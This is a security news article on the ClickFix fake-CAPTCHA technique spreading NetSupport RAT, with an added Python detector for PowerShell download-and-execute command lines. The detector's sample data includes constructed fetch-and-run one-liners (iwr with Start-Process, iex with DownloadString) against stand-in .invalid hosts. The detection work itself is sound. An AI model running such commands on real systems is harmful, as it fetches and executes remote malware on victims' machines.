Threat actors have been observed using the increasingly common ClickFix technique to deliver a remote access trojan named NetSupport RAT since early January 2025.
NetSupport RAT, typically spread via bogus websites and fake browser updates, grants attackers full control over the victim's host, allowing them to monitor the device's screen in real time, control the keyboard and mouse, upload and download files, and launch and execute malicious commands.
Originally known as NetSupport Manager, it was developed as a legitimate remote IT support program, but has since been repurposed by malicious actors to target organizations and capture sensitive information, including screenshots, audio, video, and files.
"ClickFix is a technique used by threat actors to inject a fake CAPTCHA webpage on compromised websites, instructing users to follow certain steps to copy and execute malicious PowerShell commands on their host to download and run malware payloads," eSentire said in an analysis.
In the attack chains identified by the cybersecurity company, the PowerShell command is used to download and execute the NetSupport RAT client from a remote server that hosts the malicious components in the form of PNG image files.
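As an added example (not code from the article or from eSentire), the following Python triage function flags PowerShell command lines shaped like the chain described above: a download cradle, an execution step, a payload fetched under an image extension such as .png, and a hidden window or execution-policy bypass. The sample command lines are constructed for the demonstration and use the reserved .invalid TLD; the indicator names and scoring are my own assumptions, not a published rule.

```python
import re

# Constructed sample command lines (not taken from the article). The first and
# third mimic the download-and-execute shape of the ClickFix chain; the second
# is benign administrative use included as a negative case.
SAMPLE_COMMAND_LINES = [
    'powershell.exe -w hidden -c "iwr http://cdn.example.invalid/logo.png '
    '-OutFile $env:TEMP\\a.dat; Start-Process $env:TEMP\\a.dat"',
    'powershell.exe -NoProfile -Command "Get-ChildItem C:\\Users"',
    "powershell.exe -ep bypass -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('https://img.example.invalid/pic.png')\"",
]

# Indicator patterns (assumed; tune to your own telemetry).
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)\b", re.I)
EXEC_RE = re.compile(r"\b(iex|invoke-expression|start-process|rundll32|regsvr32|msiexec)\b", re.I)
# Payload hosted under an image extension, as the article describes for NetSupport RAT.
IMAGE_URL_RE = re.compile(r"https?://\S+?\.(png|jpe?g|gif|bmp)\b", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass", re.I)


def score_command_line(cmd: str) -> dict:
    """Return which ClickFix-style indicators appear in one PowerShell command line."""
    hits = {
        "download_cradle": bool(DOWNLOAD_RE.search(cmd)),
        "executes_payload": bool(EXEC_RE.search(cmd)),
        "image_extension_url": bool(IMAGE_URL_RE.search(cmd)),
        "hidden_or_bypass": bool(HIDDEN_RE.search(cmd)),
    }
    score = sum(1 for present in hits.values() if present)
    hits["score"] = score
    # Download plus execute in a single line is the core of the chain; the image
    # URL and hidden-window flags raise confidence but are not required.
    hits["suspicious"] = hits["download_cradle"] and hits["executes_payload"]
    return hits


def triage(lines):
    """Return (command, indicators) pairs for every line judged suspicious."""
    results = [(cmd, score_command_line(cmd)) for cmd in lines]
    return [(cmd, hits) for cmd, hits in results if hits["suspicious"]]


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_COMMAND_LINES):
        print(hits["score"], cmd[:60])
```

Feed it the CommandLine field from process-creation events (Sysmon Event ID 1 or Windows 4688) rather than the constructed samples to use it on real telemetry.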
The development comes as the ClickFix technique is also being used to propagate an updated version of the Lumma Stealer malware that uses the ChaCha20 cipher to decrypt a configuration file containing the list of command-and-control (C2) servers.
"These changes provide insight into the evasive tactics employed by the developer(s) who are actively working to bypass existing extraction and analysis tools," eSentire said.